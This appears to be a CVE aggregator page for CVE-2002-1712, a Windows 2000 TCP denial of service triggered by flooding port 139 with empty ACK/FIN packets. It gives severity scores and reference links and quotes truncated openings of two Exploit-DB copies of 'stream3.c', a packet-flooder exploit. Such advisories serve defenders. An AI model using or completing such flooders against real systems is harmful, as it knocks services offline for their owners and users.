CVE-2002-1712
published 2002-12-31CVE-2002-1712: Microsoft Windows 2000 allows remote attackers to cause a denial of service (memory consumption) by sending a flood of empty TCP/IP packets with the ACK and…
PriorityP422medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
29.33%
97.9th percentile
Microsoft Windows 2000 allows remote attackers to cause a denial of service (memory consumption) by sending a flood of empty TCP/IP packets with the ACK and FIN bits set to the NetBIOS port (TCP/139), as demonstrated by stream3.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_nt | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (2)
exploitdb·2001-04-13
CVE-2002-1712 Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (2)
Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (2)
---
// source: https://www.securityfocus.com/bid/3967/info
An issue exists in Windows which could cause the TCP stack to consume all available system memory.
This is achieved if a user sends numerous empty TCP packets to a host on port 139.
Successful exploitation of this vulnerability could render the system useless.
/*
stream3.c - TCP FIN packet flooder
patched from stream.c by 3APA3A, 2000
[email protected]
*/
#include
#include
#include
#include
#include
#include
#include
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif
#include
#include
#include
#include
#include
#include
#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
struct ip_hdr {
u_int ip_hl:4
Exploit-DB
Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (1)
exploitdb·2001-04-13
CVE-2002-1712 Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (1)
Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (1)
---
// source: https://www.securityfocus.com/bid/3967/info
An issue exists in Windows which could cause the TCP stack to consume all available system memory.
This is achieved if a user sends numerous empty TCP packets to a host on port 139.
Successful exploitation of this vulnerability could render the system useless.
/*
stream3.c - FIN/ACK flooder
Tested to compile and work under FreeBSD
(c) by 3APA3A @ SECURITY.NNOV, 2000
[email protected]
http://www.security.nnov.ru
Thanx to DarkZorro & Error for discovering this problem
Greetz to void.ru. Get better, Duke!
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
No writeups or analysis indexed.
http://online.securityfocus.com/archive/1/252616http://support.microsoft.com/default.aspx?scid=kb%3BEN-US%3Bq280446http://www.securityfocus.com/bid/3967https://exchange.xforce.ibmcloud.com/vulnerabilities/8037http://online.securityfocus.com/archive/1/252616http://support.microsoft.com/default.aspx?scid=kb%3BEN-US%3Bq280446http://www.securityfocus.com/bid/3967https://exchange.xforce.ibmcloud.com/vulnerabilities/8037
2002-12-31
Published